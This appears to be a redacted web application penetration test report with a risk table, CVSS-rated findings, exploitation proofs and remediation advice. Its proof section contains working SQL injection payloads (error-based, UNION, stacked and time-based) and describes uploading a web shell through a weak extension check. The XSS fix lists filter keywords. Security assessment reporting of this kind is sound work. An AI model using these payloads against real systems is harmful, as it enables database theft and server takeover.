1. Introduction
The purpose of this analysis is to simulate a potential attacker’s influence on a web application, assess its level of security, detect vulnerabilities, analyze and develop recommendations for their elimination.
1.2. Test object
The testing process does not include active denial of service attacks, static code analysis, stress testing, and social engineering. Evaluation of server software and configuration is also outside the scope of this project. The object of testing is the web application http://xxxxxxx.com.
1.3. Main classification
Each vulnerability detected during testing is assigned a certain degree of risk.
Vulnerabilities are assigned a high degree of risk if its use can lead to data compromise, server or service unavailability, arbitrary code execution, data manipulation. This includes denial of service vulnerabilities, weak or standard passwords, lack of encryption, access to arbitrary files or sensitive data
2. Review report
2.1. Overall rating of security
As a result of the testing, the xxxxxx application is rated as highly critical, as several high-risk vulnerabilities were discovered that allow remote access to the server and confidential data.
2.2. Risk vulnerabilities
|
Risk degree |
Number |
Description |
|
High |
19 |
These vulnerabilities are rated high and pose the greatest threat. Their exploitation can lead to remote access, the execution of arbitrary code by an attacker, and the disclosure of confidential information. |
|
Average |
6 |
Vulnerabilities have a limited impact, but can be used to obtain sensitive information and, together with other vulnerabilities, will allow remote access. |
| Low | 4 |
They do not carry a real threat, but can be used to collect information, form and develop attack vectors. |
2.3. Classification Vulnerabilities
The classifications “The Common Vulnerability Scoring System (CVSSv2)”, MITRE (CAPEC) and OWASP are used to describe the degree of risk and assess the criticality of the detected vulnerabilities.
|
Type |
Number |
Power risk |
| Unrestricted upload |
2 |
High |
| SQL Injection |
5 |
High |
| Cross-Site Scripting (XSS) |
6 |
High |
| Data Manipulation |
2 |
High |
| CSRF |
1 |
High |
| Cleartext submission of
password |
1 |
High |
| Sensitive information
disclosure |
2 |
High |
| Weak Password restore |
1 |
Average |
| Full Path Disclosure |
4 |
Average |
| Frameable response |
1 |
Average |
| Cookie without HttpOnly flag set |
1 |
Low |
| Insecure authentication |
1 |
Low |
| Frameable response (potential Clickjacking) |
1 |
Low |
| Content type incorrectly stated |
1 |
Low |
3. Vulnerability Report
3.1. Type of Vulnerabilities
|
Name |
Short description | Impact (CVSSv2)
– Business impact |
Classification and Description Links |
Vulnerability ID |
|
Unrestricted upload |
A potential attacker can bypass the script to check the extension of the downloaded file, which will allow him to download a web shell, gain control of the application and access to the server.
Easy to operate Type – Remote Difficulty Detecting – easy |
10.0 |
CWE-434: Unrestricted Upload of File http://cwe.mitre.org/data/de finitions/434.html
OWASP Unrestricted File Upload https://www.owasp.org/ind ex.php/Unrestricted_File_U pload |
CWE-434:
Unrestricted Upload of File with Dangerous Type OWASP Unrestricted File Upload |
| SQL Injection | The attack is based on the implementation of the code, when user-controlled parameters are used when compiling database queries directly.
Complexity of operation – easy Type – Remote Detection Difficulty – Easy |
10.0 |
OWASP SQL Injection:
https://www.owasp.org/ind ex.php/SQL_Injection Public exploit: http://www.exploit- db.com/exploits/22877/ CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) http://cwe.mitre.org/data/de finitions/89.html |
OWASP top 10
A1 Injection
CWE-89: Improper Neutralization of Special Elements used in an SQL Command |
| XSS Cross-Site Scripting | Cross-site script execution is a type of vulnerability associated with an attack on the implementation of code executed using specially generated requests to the application and transmitted to the end user-victim.
Complexity of operation – easy Type – Remote Discovery – Easy |
8.2 |
A2-Cross-Site scripting
https://www.owasp.org/index.php/Crosssite_Scripting_(XSS) CWE-79: Improper Neutralization of Input During Web Page Generation http://cwe.mitre.org/data/definitions/79.html |
OWASP Top10
A3 Cross-Site Scripting (XSS) CWE-79: Improper Neutralization of Input During Web Page Generation |
| Data Manipulation | The vulnerability is associated with the manipulation of a user-controlled parameter. As a result, it can lead to risky actions when purchasing a product , a change in value, data substitution, etc.
Complexity of operation – easy Type – Remote Detection Difficulty – Easy |
8.0 |
Parameter Manipulation:
http://www.cgisecurity.com/owasp/html/ch11s04.html |
OWASP top 10 A1 Injection |
| Sensitive information disclosure | Disclosure of sensitive data may allow a potential attacker to identify the parameters of interest, paths to directories, orders and addresses of other users to carry out various types of attacks.
Complexity of operation – easy Type – Remote Detection Difficulty – Medium |
7.2 |
OWASP Information Leakage https://www.owasp.org/index.php/Information_Leakag e
CWE-200: Information Exposure http://cwe.mitre.org/data/de finitions/200.html |
CWE-200:
Information Exposure
A5 Security Misconfiguratio n |
| CSRF (Cross-Site Request Forgery) | A type of attack on website visitors that uses the disadvantages of the HTTP protocol. If a victim visits a website created by an attacker, a request is sent secretly on his behalf to another server (for example, to a payment system server) that performs some kind of operation on behalf of the user (for example, transferring money to the attacker’s account).
Complexity of operation – easy Type – Remote Detection Difficulty – Medium |
6.2 |
OWASP Top 10 A8 CSRF
(Cross-Site Request Forgery) https://www.owasp.org/index.php/Top_10_2010-A5 CWE-352 Cross-Site Request Forgery http://cwe.mitre.org/data/definitions/352.html |
OWASP Top 10
A8 Cross-Site Request Forgery (CSRF); CWE-352 Cross-Site Request Forgery |
| Weak Password restore | The web application does not sufficiently verify the mailing address and security question when recovering a password.
Complexity of operation – hard Type – Remote Detection Difficulty – Medium |
4.3 |
CWE-521: Weak Password Requirements: http://cwe.mitre.org/data/definitions/521.html ; Wikipedia: Password strength
http://en.wikipedia.org/wiki /Password_strength |
CWE-521:
Weak Password Requirements |
| Full Path Disclosure |
Some pages of a web application reveal the full path to the root of the site (webroot), which could be used by a potential attacker to form attack vectors. Easy to operate Type – Remote Detection Difficulty – Medium |
4.0 |
Full path disclosure https://www.owasp.org/index.php/Full_Path_Disclosur e
Path disclosure http://yehg.net/lab/pr0js/vie w.php/path_disclosure_vul nerability.txt |
CWE-200: Information Exposure |
3.2. Exploitation proof
3.2.1 Unrestricted File Upload
Any registered user can upload their avatar. Checking the extension of the downloaded file is easily done by adding the necessary extension to the file_types parameter. A potential attacker could upload a web shell to the server:
and access:
3.1.1 SQL Injection
3.2.3.1 Parameter xxx http: // xxxxxxxx / xxxx / xxx: In a POST request, parameter xxx is vulnerable to error-based and union-based SQL injection.Type: error-basedTitle: MySQL> = 5.0 AND error-based – WHERE or HAVING clausePayload: search = req_all & searchpar = ‘) AND (SELECT 6917 FROM (SELECT COUNT (*), CONCAT (0x3a6d6e663a, (SELECT (CASE WHEN (6917 = 6917) THEN 1 ELSE 0END)), 0x3a7765643a, FLOOR (RAND (0) * 2)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x) a) AND (‘GJST’ = ‘GJST & search = all & hide_some = 0 & date_from = & date_to = Type: UNION queryTitle: MySQL UNION query (NULL) – 12 columnsPayload: search = req_all & searchpar UNION ALL SELECT CONCAT (0x3a6d6e663a, 0x444b51596a7943506e55,0x3a7765643a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL # & search = all & hide_some = 0 & date_from = & date = date
3.2.3.3 URI parameter xxxx in http: // xxxxxx / xxxx / xxx
Location: URI Parameter:
Type: error-based
Title: MySQL> = 5.0 AND error-based – WHERE or HAVING clause Payload: http: // xxxxx / xxx / xxx 397 AND (SELECT 7896 FROM (SELECT
COUNT (*), CONCAT (0x3a7564643a, (SELECT (CASE WHEN (7896 = 7896) THEN 1 ELSE 0 END)), 0x3a7466623a, FLOOR (RAND (0) * 2)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x) a)
Type: stacked queries
Title: MySQL> 5.0.11 stacked queries
Payload: http: // xxxxx / xxxx / xxx / 397; SELECT SLEEP (5) –
Type: AND / OR time-based blind
Title: MySQL> 5.0.11 AND time-based blind Payload: http: // xxxxx / xxxx / xxx / 397 AND SLEEP (5)
Thus, an attacker can obtain a full dump of the database, decrypt the password hash in the administrative panel and gain full control over the application.
3.2.4 Cross Site Scripting (XSS)
REST URL Parameters
Many REST URL parameters are copied into the body of the HTML document as text without filtering between tags.
4. Elimination plan
|
Vulnerability |
Risk |
Recommendations |
| … | … | … |
| XSS Cross-Site Scripting | Theft of cookies, code execution, actions on behalf of users
– CVSSv2 = 8.2 – Vector = Remote |
User input data must be strictly checked on the server side. For example, the name parameter must contain only letters, the year of birth must contain only 4 digits, and so on. Parameters that do not meet the conditions must be rejected entirely, and not cleared. User parameters must be encoded in HTML where they are returned back from the server. All special HTML characters, including ([]){}< > “” =, must be replaced with HTML entities (< & gt; etc). Disable the use of the phrases alert, prompt, onerror,<div,<a,
%3c,iframe,onmouseover,onload,onready,object,href Use the advice of the developer of this framework. Long-term advice: filter all symbols that are not used in the parameters. Install and configure rules for the Web Application Firewall References: https://www.owasp.org/index.php/XSS_ %28Cross_Site_Scripting %29_Prevention_Cheat_Sheet http://nickcoblentz.blogspot.com/2009/01/owasps – xss-prevention-cheat-sheet.html |
5. Backlog
Test Date:
Test Object: http: // xxxx /
Test Method: Black
Software Used: Nmap, Burp suite, Owasp Zap,
Executor:
6. Conclusion
This analysis is based on technologies and known vulnerabilities at the time of testing. We advise you to follow the recommendations specified in this report in the order and severity of vulnerabilities.
In conclusion, we want to add that the application is subject to a high degree of risk, which can lead to both financial and reputation spending. Corrective action should not be delayed.
We also highly recommend that you re-test the site after the above activities. Thus, you can make sure that your resource is no longer exposed to such risks and the measures are carried out correctly.